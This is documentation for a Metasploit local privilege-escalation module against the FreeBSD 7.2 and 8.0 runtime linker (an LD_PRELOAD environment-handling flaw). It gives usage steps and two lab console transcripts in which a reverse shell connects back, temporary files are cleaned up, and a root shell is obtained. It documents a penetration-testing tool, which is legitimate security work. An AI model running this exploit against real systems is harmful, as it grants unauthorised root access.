## Description

  This module exploits a vulnerability in the FreeBSD
  run-time link-editor (rtld).

  The rtld `unsetenv()` function fails to remove `LD_*`
  environment variables if `__findenv()` fails.

  This can be abused to load arbitrary shared objects using
  `LD_PRELOAD`, resulting in privileged code execution.


## Vulnerable Application

  This module has been tested successfully on:

  * FreeBSD 7.2-RELEASE (amd64)
  * FreeBSD 8.0-RELEASE (amd64)


## Verification Steps

  1. Start `msfconsole`
  2. Get a session
  3. `use exploit/freebsd/local/rtld_execl_priv_esc`
  4. `set SESSION <SESSION>`
  5. `check`
  6. `run`
  7. You should get a new *root* session


## Options

  **SESSION**

  Which session to use, which can be viewed with `sessions`


## Scenarios

### FreeBSD 7.2-RELEASE (amd64)

  ```
  msf > use exploit/freebsd/local/rtld_execl_priv_esc 
  msf exploit(freebsd/local/rtld_execl_priv_esc) > set session 1
  session => 1
  msf exploit(freebsd/local/rtld_execl_priv_esc) > set verbose true
  verbose => true
  msf exploit(freebsd/local/rtld_execl_priv_esc) > set lhost 172.16.191.165
  lhost => 172.16.191.165
  msf exploit(freebsd/local/rtld_execl_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.165:4444 
  [+] FreeBSD version 7.2-RELEASE appears vulnerable
  [+] gcc is installed
  [+] /sbin/ping is setuid
  [*] Writing '/tmp/.Qv98Z0.c' (149 bytes) ...
  [*] Max line length is 131073
  [*] Writing 149 bytes in 1 chunks of 543 bytes (octal-encoded), using printf
  [*] Writing '/tmp/.Re1l7JG.c' (413 bytes) ...
  [*] Max line length is 131073
  [*] Writing 413 bytes in 1 chunks of 1470 bytes (octal-encoded), using printf
  [*] Writing '/tmp/.X85bYhTRF' (172 bytes) ...
  [*] Max line length is 131073
  [*] Writing 172 bytes in 1 chunks of 524 bytes (octal-encoded), using printf
  [*] Launching exploit...
  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
  [*] usage: ping [-AaDdfnoQqRrv] [-c count] [-G sweepmaxsize] [-g sweepminsize]
  [*]             [-h sweepincrsize] [-i wait] [-l preload] [-M mask | time] [-m ttl]
  [*]             [-P policy] [-p pattern] [-S src_addr] [-s packetsize] [-t timeout]
  [*]             [-W waittime] [-z tos] host
  [*]        ping [-AaDdfLnoQqRrv] [-c count] [-I iface] [-i wait] [-l preload]
  [*]             [-M mask | time] [-m ttl] [-P policy] [-p pattern] [-S src_addr]
  [*]             [-s packetsize] [-T ttl] [-t timeout] [-W waittime]
  [*]             [-z tos] mcast-group
  [*] Command shell session 2 opened (172.16.191.165:4444 -> 172.16.191.241:61425) at 2019-05-03 04:34:07 -0400
  [+] Deleted /tmp/.Qv98Z0.c
  [+] Deleted /tmp/.Qv98Z0.o
  [+] Deleted /tmp/.Fv3rwXn.0
  [+] Deleted /tmp/.Re1l7JG.c
  [+] Deleted /tmp/.Re1l7JG
  [+] Deleted /tmp/.X85bYhTRF

  id
  uid=0(root) gid=0(wheel) groups=0(wheel),1001(user)
  uname -a
  FreeBSD freebsd-7-2-amd64.local 7.2-RELEASE FreeBSD 7.2-RELEASE #0: Fri May  1 07:18:07 UTC 2009     root@driscoll.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64

  ```

### FreeBSD 8.0-RELEASE (amd64)

  ```
  msf > use exploit/freebsd/local/rtld_execl_priv_esc 
  msf exploit(freebsd/local/rtld_execl_priv_esc) > set session 1
  session => 1
  msf exploit(freebsd/local/rtld_execl_priv_esc) > set verbose true
  verbose => true
  msf exploit(freebsd/local/rtld_execl_priv_esc) > set lhost 172.16.191.165
  lhost => 172.16.191.165
  msf exploit(freebsd/local/rtld_execl_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.165:4444 
  [+] FreeBSD version 8.0-RELEASE appears vulnerable
  [+] gcc is installed
  [+] /sbin/ping is setuid
  [*] Writing '/tmp/.ppHMfMh.c' (147 bytes) ...
  [*] Max line length is 131073
  [*] Writing 147 bytes in 1 chunks of 536 bytes (octal-encoded), using printf
  [*] Writing '/tmp/.aSlXLjlX.c' (415 bytes) ...
  [*] Max line length is 131073
  [*] Writing 415 bytes in 1 chunks of 1476 bytes (octal-encoded), using printf
  [*] Writing '/tmp/.9BdfNzy' (172 bytes) ...
  [*] Max line length is 131073
  [*] Writing 172 bytes in 1 chunks of 524 bytes (octal-encoded), using printf
  [*] Launching exploit...
  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
  [*] usage: ping [-AaDdfnoQqRrv] [-c count] [-G sweepmaxsize] [-g sweepminsize]
  [*]             [-h sweepincrsize] [-i wait] [-l preload] [-M mask | time] [-m ttl]
  [*]             [-P policy] [-p pattern] [-S src_addr] [-s packetsize] [-t timeout]
  [*]             [-W waittime] [-z tos] host
  [*]        ping [-AaDdfLnoQqRrv] [-c count] [-I iface] [-i wait] [-l preload]
  [*]             [-M mask | time] [-m ttl] [-P policy] [-p pattern] [-S src_addr]
  [*]             [-s packetsize] [-T ttl] [-t timeout] [-W waittime]
  [*]             [-z tos] mcast-group
  [*] Command shell session 2 opened (172.16.191.165:4444 -> 172.16.191.239:57343) at 2019-05-03 04:36:16 -0400
  [+] Deleted /tmp/.ppHMfMh.c
  [+] Deleted /tmp/.ppHMfMh.o
  [+] Deleted /tmp/.VWnmV5K86.0
  [+] Deleted /tmp/.aSlXLjlX.c
  [+] Deleted /tmp/.aSlXLjlX
  [+] Deleted /tmp/.9BdfNzy

  id
  uid=0(root) gid=0(wheel) groups=0(wheel)
  uname -a
  FreeBSD freebsd-8-0-amd64.local 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:02:08 UTC 2009     root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64

  ```

